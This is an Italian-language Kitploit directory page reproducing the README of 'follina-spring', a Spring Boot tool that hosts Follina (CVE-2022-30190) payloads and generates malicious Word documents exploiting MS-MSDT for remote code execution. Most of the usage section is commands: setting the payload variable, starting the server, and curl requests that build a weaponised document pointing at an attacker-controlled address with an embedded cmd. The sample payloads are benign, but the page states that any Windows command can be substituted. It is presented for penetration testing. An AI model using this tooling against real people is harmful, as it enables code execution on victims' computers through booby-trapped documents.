Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
follina-spring — Server per ospitare/attivare i payload di Follina e generatore di documenti Word dannosi che sfruttano il protocollo MS-MSDT. (CVE-2022-30190) | Kitploit
Strumenti/GitHubGitHub/dsibilio/follina-spring
Generazione di PayloadExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlRed Teaming
GitHubdsibilio/follina-spring

follina-spring

Server per ospitare/attivare i payload di Follina e generatore di documenti Word dannosi che sfruttano il protocollo MS-MSDT. (CVE-2022-30190)

Vedi Repository
424 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Sfruttamento di Follina MS-MSDT con Spring Boot

Questo repository contiene una semplice applicazione Spring Boot che funge sia da server per ospitare/attivare payload Follina, sia da generatore di documenti Word dannosi pronti per essere utilizzati come vettori d'attacco per sfruttare CVE-2022-30190.

Questa vulnerabilità consiste nell'Esecuzione di Codice Remoto tramite MSDT (Microsoft Windows Support Diagnostic Tool).

Payload Lato Server

Per servire un payload unico a tua scelta, devi:

  • definisci il payload, ad esempio:
root@kitploit:~
export FOLLINA_PAYLOAD="notepad.exe"
  • esegui il server per ospitare il payload statico:
root@kitploit:~
mvn spring-boot:run
  • genera il documento Word "Follina":
root@kitploit:~
curl -s http://localhost:8080/generateDoc?address=http://192.168.64.128:8080 -o follina.doc

Se desideri cambiare il payload corrente, devi prima abbattere il server attualmente attivo, e ripetere i passaggi dopo aver definito il nuovo payload.

NOTA: il payload può essere sostituito con qualsiasi altro comando, purché possa essere eseguito tramite il CMD di Windows.

Payload Lato Client

Per servire un payload lato client a tua scelta, devi:

  • esegui il server per attivare i payload a runtime:
root@kitploit:~
mvn spring-boot:run
  • genera il documento Word "Follina" specificando il parametro query cmd, ad esempio:
root@kitploit:~
curl -sG http://localhost:8080/generateDoc --data-urlencode 'address=http://192.168.64.128:8080' --data-urlencode 'cmd=start msedge.exe https://www.youtube.com/watch?v=zqTwOoElxBA' -o follina.doc

Il payload in questo caso è incorporato all'interno del documento e avrà semplicemente bisogno di attivazione contattando il server. In questo modo, puoi avere molteplici payload diversi distribuiti su documenti differenti e non dovrai riavviare il server per attivare cambi di payload – poiché puoi semplicemente generare un nuovo documento con il payload desiderato incorporato.

Riconoscimenti

Molte grazie a John Hammond per aver creato l'implementazione Python e per aver condiviso la sua analisi della CVE.

Scarica lo strumento